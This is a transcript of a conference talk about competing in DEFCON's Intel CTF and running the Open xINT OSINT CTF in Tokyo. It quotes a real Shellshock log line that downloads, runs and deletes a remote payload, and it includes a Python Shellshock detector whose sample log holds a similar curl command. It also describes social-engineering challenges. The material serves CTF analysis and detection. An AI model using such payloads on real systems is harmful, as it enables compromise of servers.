
Intel CTF and Open xINT CTF 20161220

Yuho Kameda
December 20, 2016

A talk about taking part in and running OSINT CTFs! 2016/12/20 #ssmjp


Transcript

  1. A talk about taking part in and running OSINT CTFs!
    2016/12/20 #ssmjp @YuhoKameda
    @pinja_xyz

  2. About me
    Yuho Kameda : ykame (@YuhoKameda)
    ZAP Evangelist
    OSINT
    Main work:
    Web application vulnerability assessment
    Platform vulnerability assessment
    SOC/CSIRT work
    Staff for any kind of emergency case...
    Information gathering

  3. What I'll talk about today
    Taking part in Intel CTF at DEFCON
    Running Open xINT CTF at AV Tokyo

  4. Taking part in Intel CTF at DEFCON

  5. Intel CTF at DEFCON
    What is DEFCON?
    Held every summer in Las Vegas
    Held right after BlackHat
    A hacker festival with all sorts of CTFs and contests

  6. Intel CTF at DEFCON
    What is Intel CTF?
    A competition focused on intelligence, started in 2015
    The theme of the 2nd edition (2016): acting as a Threat Intelligence Analyst at a company in the world's Top 50, answer a series of questions while tracking down an attacker
    Prize for first place: $2,500
    We took part as pinja! (@lumin, @awamori_tt + me)
    We finished 12th

  7. Intel CTF results

  8. What kind of questions were there?
    Question 1, The Vuln:
    What is the vulnerability that was successfully exploited also "known" as?
    Find the one line where the attack succeeded among 5.08 million lines of Apache logs spread over 4 files
    XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/?id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O /tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http://52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
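As an added example (not from the talk or the CTF), a small Python filter that parses Apache combined-format log lines and flags Shellshock attempts: the `() {` bash function-definition marker injected into a header value such as User-Agent or Referer, which is what CVE-2014-6271 abused. It reports the status code alongside each hit so that the line answered with a 500 (as in the slide) can be separated from mere probes. The sample log lines and the IP 192.0.2.10 are constructed for this example.

```python
import re
from typing import Iterable, List, Optional

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock payloads start with a bash function definition placed in a header value
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_shellshock(lines: Iterable[str]) -> List[dict]:
    """Return the parsed entries whose Referer or User-Agent carries the Shellshock marker."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if SHELLSHOCK_RE.search(entry["referer"]) or SHELLSHOCK_RE.search(entry["agent"]):
            hits.append(entry)
    return hits


# Constructed sample: a benign request, a probe answered 404, and an attempt answered 500
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Jul/2016:02:57:01 -0700] "GET /product/?id=1 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [21/Jul/2016:02:57:40 -0700] "GET /cgi-bin/x HTTP/1.0" 404 210 "-" "() { :; }; echo probe"',
    '10.0.0.7 - - [21/Jul/2016:02:58:19 -0700] "GET /product/?id=2085 HTTP/1.0" 500 4958 "" '
    '"() { : ; }; /bin/bash -c \'curl -o /tmp/a.jpg http://192.0.2.10/\'"',
]

if __name__ == "__main__":
    # On a real log: find_shellshock(open("access.log", encoding="utf-8", errors="replace"))
    for h in find_shellshock(SAMPLE_LOG):
        print(h["host"], h["status"], h["request"], h["agent"][:40])
```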

  9. What is the answer to question 1?
    What is the vulnerability that was successfully exploited also "known" as?
    We just couldn't get the answer accepted...
    Shellshock?
    shellshock?

  10. What is the answer to question 1?
    What is the vulnerability that was successfully exploited also "known" as?
    We just couldn't get the answer accepted...
    Shellshock?
    shellshock?
    Bashbug?
    CVE-2014-6271?

  11. What is the answer to question 1?
    What is the vulnerability that was successfully exploited also "known" as?
    We just couldn't get the answer accepted...
    Shellshock?
    shellshock?
    Bashbug?
    CVE-2014-6271?
    The answer was "Bashdoor"

  12. Other questions

    What does the malware communicate with?
    What is the ASN (Autonomous System Number) of the attacker's IP?
    What version of web server is the attacker's IP exposing?

    What is the malware's name?
    Which function has been disabled?
    What is the bot's name?
    What Maildrop does the bot herder use?

  13. There is also the Social Engineering CTF (SECTF)
    A competition where you phone real companies and extract information from them
    A headline contest that also awards a Black Badge
    I posted information about the 2015 edition on blog.yka.me
    http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html

  14. Running Open xINT CTF at AV Tokyo

  15. What is AV Tokyo?
    A hacker community where people from the security scene get together and drink, listen to talks and drink, and drink
    no drink! no hack!

  16. Timeline up to the submission
    8/6 20:00 "I'd like to run an OSINT-related CTF in Japan too"
    "Doing it through the company would constrain the content... how about AV Tokyo's CFx?"
    "The deadline (8/15) is close; shall we submit once things calm down?"
    8/7 10:00 - 16:00 Took part in the Intel CTF competition
    8/8 13:19 Shared the writeup
    8/8 22:26 First draft of the Call For X text
    8/12 Call For X submission done

  17. We actually ran it
    10/22 15:00 - 19:30 @ Shibuya

  18. What is Open xINT CTF? http://xintctf.wpblog.jp/
    A modern spy-training contest: gather the information you need by questioning people at the venue and through SNS, solve the hints that are revealed one after another, and reach the final target
    Diagram labels: participant (spy); investigate the attacker; (another spy); attacker (hacker); contact; USB search request; plant a trap on the USB and make contact; investigate independently

  19. There were 7 questions
    1. What is the email address of the person who set up pinja.xyz (the attacker)?
    2. Which Facebook account does the attacker own?
    3. What are the coordinates of the restaurant the attacker stopped by (photo)?
    4. Which Facebook account belongs to the person (spy) eating with the attacker?
    5. Identify this person (spy) from the photo, make contact inside AV Tokyo, "gain their trust" and extract information
    6. Using the information obtained from the spy, find the "item" and the information it yields
    7. Plant a trap link on that item and hand the "item" to the attacker inside AV Tokyo "without raising suspicion"

  20. Searching for a certain "item" (USB)
    Check for a response with the MAMORIO app
    http://www.mamorio.jp/
    Search the area where the app got a response

  21. For details, see the participants' writeups!
    Extreme CTF is hard (Open xINT writeup?)
    http://pinksawtooth.hatenablog.com/entry/2016/10/24/010049
    Open xINT CTF Writeup
    http://qiita.com/nicklegr/items/5ebcdaac86a21613c94a

  22. Number of participants: 93
    Solved at least one question: 67
    Answer distribution
    Q1: 67, Q2: 49, Q3: 8, Q4: 28, Q5: 7

  23. Final results (700 points or more) [total score + spy score + time of last answer]
    Sh1n0g1       900 + (100)  18:45:56
    tigerszk      900 + (100)  19:20:49
    rcsirt        900 + (0)    17:16:36
    nicklegr      700 + (200)  17:39:52
    brightblue    900 + (0)    19:25:33
    TomoriNao     700 + (100)  17:20:22
    tonko2        600 + (100)  17:11:11
    Sakura Ayane  700 + (0)    17:31:46
    Entrants whose name does not match their registered name receive 0 spy points
    In the event of a tie, the earlier time of last answer ranks higher
